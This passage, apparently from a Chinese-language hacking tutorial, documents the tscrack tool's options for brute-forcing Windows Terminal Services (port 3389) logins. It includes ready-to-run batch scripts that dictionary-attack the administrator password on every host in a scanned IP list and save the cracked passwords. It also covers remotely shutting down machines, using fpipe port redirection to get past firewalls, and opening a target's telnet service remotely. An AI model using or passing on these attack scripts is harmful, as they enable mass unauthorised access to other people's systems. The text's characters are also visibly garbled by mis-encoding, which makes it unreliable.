參數(shù)說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯(cuò)誤時(shí)發(fā)出的聲音
-t 同是發(fā)出多個(gè)連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f后面的密碼
-F 間隔時(shí)間(頻率)
-l 使用-l后面的用戶名
-w 使用-w后面的密碼字典
-p 使用-p后面的密碼
-D 登錄主頁(yè)面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠(yuǎn)程用密碼字典文件暴破
主機(jī)的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠(yuǎn)程登陸
192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) (假設(shè)現(xiàn)有用SuperScan或其它掃錨器掃到一批開有3389的主
機(jī)IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個(gè)IP,接著運(yùn)行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運(yùn)行3389.bat就OK,且3389.bat、hack.bat、3389.txt、
pass.dic與tscrack.exe在同一個(gè)目錄下;就可以等待結(jié)果了)
hack.bat意思是:運(yùn)行tscrack.exe用字典暴破3389.txt中所有主機(jī)的
administrator密碼,并將破解結(jié)果保存在rouji.txt文件中。
5、其它:
Shutdown.exe
Shutdown //IP地址 t:20 20秒后將對(duì)方NT自動(dòng)關(guān)閉(Windows 2003系統(tǒng)自帶工具
,在Windows2000下用進(jìn)就得下載此工具才能用。在前面Windows 2003 DOS命令中
有詳細(xì)介紹。)
fpipe.exe (TCP端口重定向工具) 在第二篇中有詳細(xì)說明(端口重定向繞過防火
墻)
fpipe -l 80 -s 1029 -r 80 [url]www.sina.com.cn[/url] 當(dāng)有人掃錨你的80端口時(shí),他掃
到的結(jié)果會(huì)完全是[url]www.sina.com.cn[/url]的主機(jī)信息
Fpipe -l 23 -s 88 -r 23 目標(biāo)IP 把本機(jī)向目標(biāo)IP發(fā)送的23端口Telnet請(qǐng)求經(jīng)端
口重定向后,就通過88端口發(fā)送到目標(biāo)IP的23端口。(與目標(biāo)IP建立Telnet時(shí)本
機(jī)就用的88端口與其相連接)然后:直接Telnet 127.0.0.1(本機(jī)IP)就連接到
目標(biāo)IP的23端口了。
OpenTelnet.exe (遠(yuǎn)程開啟telnet工具)
opentelnet.exe //IP 帳號(hào) 密碼 ntlm認(rèn)證方式 Telnet端口 (不需要上傳
ntlm.exe破壞微軟的身份驗(yàn)證方式)直接遠(yuǎn)程開啟對(duì)方的telnet服務(wù)后,就可用
telnet //ip 連接上對(duì)方。
NTLM認(rèn)證方式:0:不使用NTLM身份驗(yàn)證;1:先嘗試NTLM身份驗(yàn)證,如果失敗
,再使用用戶名和密碼;2:只使用NTLM身份驗(yàn)證。
ResumeTelnet.exe (OpenTelnet附帶的另一個(gè)工具)
resumetelnet.exe //IP 帳號(hào) 密碼 用Telnet連接完對(duì)方后,就用這個(gè)命令將
對(duì)方的Telnet設(shè)置還原,并同時(shí)關(guān)閉Telnet服務(wù)。
6、FTP命令詳解:
FTP命令是Internet用戶使用最頻繁的命令之一,熟悉并靈活應(yīng)用FTP的內(nèi)部命令
,可以大大方便使用者,并收到事半功倍之效。如果你想學(xué)習(xí)使用進(jìn)行后臺(tái)FTP下
載,那么就必須學(xué)習(xí)FTP指令。
FTP的命令行格式為:
ftp -v -d -i -n -g [主機(jī)名] ,其中
-v 顯示遠(yuǎn)程服務(wù)器的所有響應(yīng)信息;
-n 限制ftp的自動(dòng)登錄,即不使用;.n etrc文件;
-d 使用調(diào)試方式;
-g 取消全局文件名
新聞熱點(diǎn)
疑難解答
圖片精選